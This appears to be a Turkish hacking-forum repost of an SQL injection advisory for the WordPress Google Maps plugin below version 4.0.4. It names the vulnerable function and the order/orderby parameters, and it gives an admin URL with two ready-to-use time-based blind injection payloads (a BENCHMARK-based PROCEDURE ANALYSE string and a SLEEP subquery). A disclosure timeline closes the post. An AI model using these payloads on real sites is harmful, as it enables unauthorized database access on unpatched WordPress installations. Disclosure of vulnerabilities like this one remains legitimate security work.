-
ZerOne
EVIL
WordPress SQL İnjection
Bu SQL İnjection açığı WordPress'de yüklenmiş olan plugin Google Maps 4.0.4'den aşağı versiyonlarda çalışır
Güvenlik Riski - Yüksek
1.
SQL injectionBu SQL İnjection açığı WordPress'de yüklenmiş olan plugin Google Maps 4.0.4'den aşağı versiyonlarda çalışır
Güvenlik Riski - Yüksek
1.
View hidden content is available for registered users!
Güvenlik Açıklı Funksiyon : $wpdb->get_results()
View hidden content is available for registered users!
Güvenlik Açıklı seçenek: $_GET['order']
SQL açıklı URL:
http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc
View hidden content is available for registered users!
PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
2.
SQL Seçeneği
View hidden content is available for registered users!
# SQL injection
# Vulnerable Function: $wpdb->get_results()
# Vulnerable Variable: $_GET['orderby']
# Vulnerable URL:
http://vulnerablesite.com/wp-admin/...ation&order=asc&orderby=location_address AND (SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
# Disclosure Timeline
# 2018/05/11 Vulnerabilities discovered
# 2018/05/16 Vendor contacted
# 2018/06/08 No response
# 2018/06/12 Advisory released to the public
